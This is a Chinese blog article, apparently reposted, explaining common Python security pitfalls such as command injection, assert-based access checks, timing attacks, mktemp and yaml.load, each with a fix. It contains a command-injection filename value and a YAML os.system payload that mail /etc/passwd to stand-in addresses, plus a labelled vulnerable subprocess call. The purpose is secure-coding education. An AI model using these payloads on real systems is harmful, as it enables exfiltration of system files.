溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Python 中的 10 個常見安全漏洞,以及如何避免(上)

發(fā)布時間:2020-07-05 18:55:09 來源:網(wǎng)絡 閱讀:337 作者:跨界的聚能 欄目:編程語言

簡評:編寫安全代碼很困難,當你學習一個編程語言、模塊或框架時,你會學習其使用方法。 在考慮安全性時,你需要考慮如何避免被濫用,Python 也不例外,即使在標準庫中,也存在用于編寫應用的不良實踐。然而,許多 Python 開發(fā)人員卻根本不知道它們。

1. 輸入注入(Input injection)

注入×××非常廣泛而且很常見,注入有很多種類,它們影響所有的語言、框架和環(huán)境。

SQL 注入是直接編寫 SQL 查詢(而非使用 ORM) 時將字符串字面量與變量混合。我讀過很多代碼,其中「escaping quotes」被認為是一種修復,但事實并非如此,可以通過這個鏈接查看 SQL 注入所有可能發(fā)生的復雜方式。

命令注入可能在使用 popen、subprocess、os.system 調用一個進程并從變量中獲取參數(shù)時發(fā)生,當調用本地命令時,有人可能會將某些值設置為惡意值。

下面是個簡單的腳本,使用用戶提供的文件名調用子進程:

import subprocess

def transcode_file(request, filename):
    command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
    subprocess.call(command, shell=True)  # a bad idea!

×××者會將 filename 的值設置為“; cat / etc / passwd | mail them@domain.com 或者其他同樣危險的東西。

修復:

如果你使用了 Web 框架,可以用附帶的實用程序對輸入進行清理,除非有充分的理由,否則不要手動構建 SQL 查詢,大多數(shù) ORM 都具有內置的消毒方法。

對于 shell,可以使用 shlex 模塊正確地轉義輸入。

2. assert 語句(Assert statements)

不要使用 assert 語句來防止用戶訪問不應訪問的代碼段。

def foo(request, user):
   assert user.is_admin, “user does not have access”
   # secure code...

現(xiàn)在,默認情況下,Python 以 debug 為 true 來執(zhí)行腳本,但在生產(chǎn)環(huán)境中,通常使用優(yōu)化運行,這將會跳過 assert 語句并直接轉到安全代碼,而不管用戶是否是 is_admin。

修復:

僅在與其他開發(fā)人員進行通信時使用 assert 語句,例如在單元測試中或為了防止不正確的 API 使用。

3. 計時×××(Timing attacks)

計時×××本質上是一種通過計時比較提供值所需時間來暴露行為和算法的方式。計時×××需要精確性,所以通常不能用于高延遲的遠程網(wǎng)絡。由于大多數(shù) Web 應用程序涉及可變延遲,因此幾乎不可能在 HTTP Web 服務器上編寫計時×××。

但是,如果你有提示輸入密碼的命令行應用程序,則×××者可以編寫一個簡單的腳本來計算將其值與實際密碼進行比較所需的時間。

修復:

使用在 Python 3.5 中引入的 secrets.compare_digest 來比較密碼和其他私密值。

4.臨時文件(Temporary files)

要在 Python 中創(chuàng)建臨時文件,通常使用 mktemp() 函數(shù)生成一個文件名,然后使用該名稱創(chuàng)建一個文件。 「這是不安全的,因為另一個進程可能會在調用 mktemp() 和隨后嘗試通過第一個進程創(chuàng)建文件之間的空隙創(chuàng)建一個同名文件?!惯@意味著應用程序可能加載錯誤的數(shù)據(jù)或暴露其他的臨時數(shù)據(jù)。

如果調用不正確的方法,則最新版本的 Python 會拋出運行警告。

修復:

如果需要生成臨時文件,請使用 tempfile 模塊并使用 mkstemp。

5. 使用 yaml.load

引用 PyYAML 文檔:

警告:使用從不可信源接收到的數(shù)據(jù)來調用 yaml.load 是不安全的! yaml.load 和pickle.load 一樣強大,所以可以調用任何 Python 函數(shù)。
在流行的 Python 項目 Ansible 中找到的這個美麗的例子,你可以將此值作為(有效)YAML 提供給 Ansible Vault,它使用文件中提供的參數(shù)調用 os.system()。

!!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]
所以,從用戶提供的值中有效地加載 YAML 文件會讓應用對×××打開大門。

修復:

總是使用 yaml.safe_load,除非你有一個非常好的理由。

Python 中的 10 個常見安全漏洞,以及如何避免(上)

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權內容。

AI